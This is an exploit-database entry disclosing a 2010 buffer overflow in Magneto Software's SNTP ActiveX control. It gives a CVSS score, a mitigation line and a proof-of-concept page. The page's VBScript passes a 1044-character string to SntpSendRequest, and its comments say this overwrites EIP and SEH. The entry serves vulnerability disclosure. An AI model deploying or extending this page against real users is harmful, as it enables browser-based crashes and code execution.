Magneto Software SNTP ActiveX SntpSendRequest BOF POC

vendor:

SNTP ActiveX

by:

s4squatch

9,3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: SNTP ActiveX

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Magneto Software SNTP ActiveX SntpSendRequest BOF POC

A buffer overflow vulnerability exists in Magneto Software SNTP ActiveX SntpSendRequest function, which can be triggered by sending a specially crafted string of 1044 characters to the vulnerable application. This can lead to arbitrary code execution.

Mitigation:

Upgrade to the latest version of Magneto Software SNTP ActiveX.

Source

Exploit-DB raw data:

<html>
<object classid='clsid:A3010B66-C229-11D5-B7BA-00C0F02DFC67' id='target' /></object>
<script language='vbscript'>
'Magneto Software SNTP ActiveX SntpSendRequest BOF POC
'Discovered by:  s4squatch
'Site: www.securestate.com
'www:  http://www.magnetosoft.com/products/sksntp/sksntp_features.htm
'Download:  http://www.magnetosoft.com/downloads/sksntp_setup.exe
'Vendor Notified: 02/02/10 --> NO RESPONSE
'Vendor Notified: 02/11/10 --> NO RESPONSE
'Vendor Notified: 02/17/10 --> NO RESPONSE
'Published 04/13/10
'File Name = SKSntp.ocx
'www:  http://www.magnetosoft.com/products/sksntp/sksntp_features.htm
'Download:  http://www.magnetosoft.com/downloads/sksntp_setup.exe
'Function SntpSendRequest ( ByVal bstrSntpServer As String ,  ByVal bSynchronizeClock As Integer ) As Long
'memberName = "SntpSendRequest"
'progid     = "SKSNTPLib.SKSntp"

'1044 overwrites EIP, ESP, ECX, EBP, SEH

buff = String(1044, "A")

target.SntpSendRequest buff ,1

</script>